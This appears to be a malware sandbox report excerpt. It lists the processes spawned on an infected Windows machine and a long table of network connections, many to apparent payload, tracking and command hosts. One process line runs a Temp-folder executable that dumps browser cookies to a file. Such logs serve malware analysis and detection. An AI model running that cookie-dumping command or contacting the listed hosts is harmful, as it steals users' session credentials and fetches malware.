"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6940 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6988 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4248 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| N/A | 51.124.78.146:443 | | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 40.126.31.135:443 | | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | | tcp |
| N/A | 52.247.37.26:80 | | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 104.21.5.208:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 8.8.8.8:53 | fsstoragecloudservice.com | udp |
| N/A | 8.8.8.8:53 | hockeybruinsteamshop.com | udp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 52.219.62.11:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 104.21.88.226:80 | i.spesgrt.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.67.145.110:443 | a.goatagame.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 52.219.62.11:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 52.219.66.11:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.66.11:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 185.206.215.216:80 | | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 185.186.142.245:22850 | | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 193.56.146.22:26336 | | tcp |
| N/A | 135.148.139.222:1494 | | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 152.32.151.93:80 | 152.32.151.93 | tcp |
| N/A | 188.124.36.242:25802 | | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 52.219.156.26:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.156.26:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 45.87.3.183:2705 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 52.222.137.29:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 52.222.137.29:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 104.18.20.226:80 | crl.globalsign.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 144.76.17.137:80 | s3.tebi.io | tcp |
| N/A | 144.76.17.137:80 | s3.tebi.io | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 104.18.21.226:80 | crl.globalsign.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 185.230.143.48:14462 | tcp | |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.21.35.173:443 | bestinternetstore.xyz | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 37.0.10.214:80 | tcp | |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.18.21.226:80 | crl.globalsign.com | tcp |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 185.49.70.90:2080 | tcp | |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 135.181.123.52:12073 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 94.103.83.88:65136 | tcp | |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | a.goatagame.com | udp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 52.219.62.3:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 62.172.138.35:80 | geo.netsupportsoftware.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 52.219.62.3:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.26.8.187:80 | proxycheck.io | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 185.206.215.216:80 | tcp | |
| N/A | 52.219.160.70:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.160.70:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 172.67.129.55:443 | money4systems4.xyz | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 185.186.142.245:22850 | tcp | |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 172.217.19.196:80 | www.google.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 104.16.203.237:443 | www.mediafire.com | tcp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 194.87.138.150:80 | afleof21klg.top | tcp |
| N/A | 194.87.138.150:80 | afleof21klg.top | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 204.79.197.203:443 | api.msn.com | tcp |
| N/A | 204.79.197.203:443 | api.msn.com | tcp |
| N/A | 199.91.153.246:443 | download1999.mediafire.com | tcp |
